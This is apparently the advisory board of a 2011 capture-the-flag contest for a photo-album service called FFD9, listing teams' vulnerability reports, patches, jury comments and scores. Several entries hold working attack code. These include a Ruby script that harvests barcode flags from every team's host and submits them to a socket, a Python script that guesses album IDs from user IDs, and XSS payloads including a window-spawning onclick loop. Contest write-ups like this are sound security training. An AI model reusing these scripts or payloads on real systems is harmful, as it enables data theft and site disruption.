|
FFD9 Advisories
Service: | FFD9 |
---|
Text: | FFD9
vuln: you can load ANY files from your FS, they can be shells on perl
tell me please how 2 use it =)
solution : check the signature
|
---|
Jury comment: | Plz, prove this and get patch and exploit |
---|
Score: | 0/10 points |
---|
Service: | FFD9 |
---|
Text: | you can find pictures similar to flag which are barcodes.
exploit: get one picture of flag (barcode) and search it. Will get several new pictures, decode it -> get flags. |
---|
Jury comment: | Yes. Please get patch and code of exploit. |
---|
Score: | 2/5 points |
---|
Service: | FFD9 |
---|
Text: | part of exploit:
for team in 1..99 do
next if team == $myteam
begin
www.goto "http://10.23.#{team}.3"
www.file_field(:name, "searh_image").set "D:\\1.png"
www.text_field(:id, "magick_input").set "-30"
www.image(:id, "find_image").click
images_ar=[]
www.html.scan(/IMG alt="" src="(\/photo\/[^"]*)" width=400/m){|im|
images_ar.push im
}
otvets_ar=[]
images_ar.each{|im|
Net::HTTP.start("10.23.#{team}.3") { |http|
resp = http.get("#{im}.png")
open("flags/#{im.to_s.gsub('/','')}.png", "wb") { |file|
file.write(resp.body)
}
n_a = `C:\\Program Files\\ZBar\\bin\\zbarimg.exe -d -q -D D:\\coding\\ructfe2011\\flags\\#{im.to_s.gsub('/','')}.png`
otvets_ar.push n_a.gsub('CODE-128:','')
}
puts otvets_ar
t = TCPSocket.new('10.23.41.162', 31337)
t.gets
t.puts otvets_ar.join(' ')
ttt = t.gets
puts ttt
t.close
}
rescue
puts "error #{team}"
end
end |
---|
Jury comment: | Cool, but patch is not avaliable for now |
---|
Score: | 2/5 points |
---|
Service: | FFD9 |
---|
Text: | patch is to cut off similar fotos from the search output. file find.html.ep |
---|
Jury comment: | It's broke service functionality |
---|
Score: | 0/5 points |
---|
Service: | FFD9 |
---|
Text: | patch for similar fotos :
add private => 0 in find_one function . File FFD9DB.pm, line 198 |
---|
Jury comment: | Ok |
---|
Score: | 1/5 point |
---|
Service: | FFD9 |
---|
Text: | Album IDs are predictable from user IDs:
The game server submits flags to FFD9 as album titles. It does this by creating a new user and subsequently creating a new album. If you know the user ID (i.e. by using the URL http://10.23.?.3/users/), you only have to increment the ID by 1 in order to get a valid album ID. By using http://10.23.?.3/user/album/<aid> you can then determine the name of that album and hence captured the flag.
Resolution:
Instead of using the mongodb ObjectID as the (secret) id of albums, generate an actual random number and use that one as the key to identify albums. (Requires some coding.)
An easier resolution is to just resolve the http://10.23.?.3/users/ weakness. User IDs are still drawn deterministically but that way album IDs become much harder to guess. |
---|
Jury comment: | Yes, please provide patch for full points |
---|
Score: | 5/8 points |
---|
Service: | FFD9 |
---|
Text: |
------------------------------ [[ FluxFingers ]] ------------------------------
--[ Description ]--------------------------------------------------------------
It is possible to read the flags from the album.
--[ Patch ]--------------------------------------------------------------------
/public/js/index.js
Line: 61
Change:
$(s).appendTo('#users');
to
$(z).appendTo('#users');
--[ Exploit ]------------------------------------------------------------------
1. Get the User Id, which is in the link on your index (like <a href="/user/4ec7c9283a1171b201000003">chnmvwvfzvjr</a>)
the user id is 4ec7c9283a1171b201000003
2. Increment this to 4ec7c9283a1171b201000004
3. Call http://$ip/user/album/4ec7c9283a1171b201000004
4. Get the flag :) (its like: Name: FHT0S596XY2P438GUYOH7TDZDKF6PRX=) |
---|
Jury comment: | Yes, but exploit already posted. And this patch don't work in all cases. (http://ip/users) |
---|
Score: | 1/8 point |
---|
Service: | FFD9 |
---|
Text: | Exploit for getting flags from non-patched service
regexp = "\w{24}"
flag = "\w{31}="
d = urllib2.urlopen(url=sys.argv[1] + "/users", timeout=20)
s = d.read()
uids = re.findall(regexp, s)
for uid in uids[-20:]:
aid = int(uid, 16) + 1
try:
al = urllib2.urlopen(url=sys.argv[1] + ("/user/album/%x"%aid), timeout = 5)
for f in re.findall(flag, al.read()):
print f
except urllib2.HTTPError:
pass
except urllib2.URLError:
pass
|
---|
Jury comment: | Already posted by other team |
---|
Score: | 0/8 points |
---|
Service: | FFD9 |
---|
Text: | You can see all users id by going to url http://10.23.x.y/users |
---|
Jury comment: | Ok |
---|
Score: | 1/1 point |
---|
Service: | FFD9 |
---|
Text: | login to system with credentials admin : admin - get access to site |
---|
Jury comment: | It is test user. Not a bug. |
---|
Score: | 0/1 points |
---|
Service: | FFD9 |
---|
Text: | You can log in as admin with username 'admin' pass 'admin' after service starts |
---|
Jury comment: | It is test user. Not a bug. |
---|
Score: | 0/1 points |
---|
Service: | FFD9 |
---|
Text: | db collection has 'admin':'admin' entry |
---|
Jury comment: | It is test user. Not a bug. |
---|
Score: | 0/1 points |
---|
Service: | FFD9 |
---|
Text: | FFD9, which runs on Port 80 of the VulnBox, has a default username / password pair of admin:admin
To fix:
Connect to the database for ffd9::
mongo ffd0
Generate a new Password:
echo -n "F00" | md5sum
change the admin passwort:
db.users.update({name:"admin"}, {$set:{pass: "MD5SUM"}})
|
---|
Jury comment: | It is not a bug. It is test user. |
---|
Score: | 0/1 points |
---|
Service: | FFD9 |
---|
Text: | default pass for admin is admin |
---|
Jury comment: | Yes. It is not bug. It is test user |
---|
Score: | 0/1 points |
---|
Service: | FFD9 |
---|
Text: | using 10.23.%teamAddr%.%battlePort% you can get users, there are users id`s. using user id you can connect as http://10.23.48.133/user/%userId%
close it by .htaccess
|
---|
Jury comment: | plz, prove it |
---|
Score: | 0/5 points |
---|
Service: | FFD9 |
---|
Text: | Its possible to extract all currently stored flags (decoded barcodes from uploaded images) by using the find feature.
Since the value of the magick_input field is not properly sanitized one can provide arbitrary large values (>30).
Due to this all images are considered similar to the one uploaded (See javascript code in FFD9DB.pm[search function])
This can be easily prevent by sanitizing the supplied value:
var m = <%= $m %>;
if (m > 30) {
m = 30
}
var n = <%= $n %> + m;
...
|
---|
Jury comment: | this does not fix vuln. also not exploit. |
---|
Score: | 2/10 points |
---|
Service: | FFD9 |
---|
Text: | "data.widht" - typo at file: index.js, str: 73 |
---|
Jury comment: | Yes ;). But it is not security bug. |
---|
Score: | 0/1 points |
---|
Service: | FFD9 |
---|
Text: | You can upload any file via admin upload. Parses only extension |
---|
Jury comment: | No. You can not upload any file. Please prove it. |
---|
Score: | 0/1 points |
---|
Service: | FFD9 |
---|
Text: | You can upload any file with "image" extension, for example "JPG", via upload. Destination can be found via looking page source. |
---|
Jury comment: | Yes, but it is not a security bug |
---|
Score: | 0/1 points |
---|
Service: | FFD9 |
---|
Text: | patching possibility of including files:
my ($x,$y,$z)=unpack("CCC",$String);
my $c = chr $x;
$c.= chr $y;
$c.= chr $z;
if ( $c !eq "яШя") {
#go home
}
for jpg files or smth like this |
---|
Jury comment: | It's checked in other place |
---|
Score: | 0/1 points |
---|
Service: | FFD9 |
---|
Text: | ===== Team: My Little Pwnies ======================================
=== Number: 82 ====================================================
===== Time: 11/19/2011 @ 16:10 UTC =================================
-------------------------------------------------------------------
--- 1. Summary: ---------------------------------------------------
-------------------------------------------------------------------
The FFD9 service has XSS in the Ablum Name Field after the user logs in.
-------------------------------------------------------------------
--- 2. Description: -----------------------------------------------
-------------------------------------------------------------------
When entering an album name, malicious script can be entered to create reflective XSS in the album name.
Upon refreshing the page this is displayed with filtered characters.
-------------------------------------------------------------------
--- 3. Impact: ----------------------------------------------------
-------------------------------------------------------------------
Potentially allow an attacker to insert malicious page into a user's page thereby controlling their session thereafter or stealing cookies.
-------------------------------------------------------------------
--- 4. Affected Services: -----------------------------------------
-------------------------------------------------------------------
FFD9 Album name
-------------------------------------------------------------------
--- 5. Solution: --------------------------------------------------
-------------------------------------------------------------------
Filter characters such as [<>/&%();'"] and script tags.
-------------------------------------------------------------------
--- 6. Time Table: ------------------------------------------------
-------------------------------------------------------------------
11/19/2011 - 11:10am submitted |
---|
Jury comment: | This only works for you and works only while create a new album. Scripts are not executed when displaying a list of album. |
---|
Score: | 0/1 points |
---|
Service: | FFD9 |
---|
Text: | album name is xss vulnerabed, put
<a href="#" onclick="now();function now() {for (i=1;i>0;i++){open('DieScript.htm','new'+i);}}">myname</a>
and get saaaad..
solution : use standart escape functions |
---|
Jury comment: | This only works for you and works only while create a new album. Scripts are not executed when displaying a list of album. |
---|
Score: | 0/1 points |
---|
Service: | FFD9 |
---|
Text: |
Service: FFD9
Vulnerability: XSS
You can register new users and inject code over the username.
Exploit:
Register a user named "<iframe>". In the userlist the name is printed directly and an iframe appears.
Fix:
Use the Perl module HTML::Entities to fix this problem.
HTML::Entities::encode($text);
|
---|
Jury comment: | Ok |
---|
Score: | 2/2 points |
---|
Service: | FFD9 |
---|
Text: | ATTENTION: This advisory is similar to the old one but another form is vulnerable
Service: FFD9
Vulnerability: XSS
You can register new users and inject code over the username.
Exploit:
Create an album named "<iframe>". In the albumlist the name is printed directly and an iframe appears.
Fix:
Use the Perl module HTML::Entities to fix this problem.
HTML::Entities::encode($text); |
---|
Jury comment: | Repeat. |
---|
Score: | 0/2 points |
---|
Service: | FFD9 |
---|
Text: | Cross site scripting vulnerability in username entry |
---|
Jury comment: | Already post |
---|
Score: | 0/2 points |
---|
Service: | FFD9 |
---|
Text: | 1) Description of Vulnerability
XSS
======================================================================
2) Exploit / PoC
Use:
asd6<img%20src%3da%20onmouseover%3dalert(1)>f8baa65cb68
for
http://10.23.XX.3/ - login function
======================================================================
3) Patch
avoid the usage of html encoding
====================================================================== |
---|
Jury comment: | Already posted |
---|
Score: | 0/2 points |
---|
Service: | FFD9 |
---|
Text: | XSS when registering a user can delete all content on the page, bringing the service down |
---|
Jury comment: | Already posted. |
---|
Score: | 0/2 points |
---|
|
|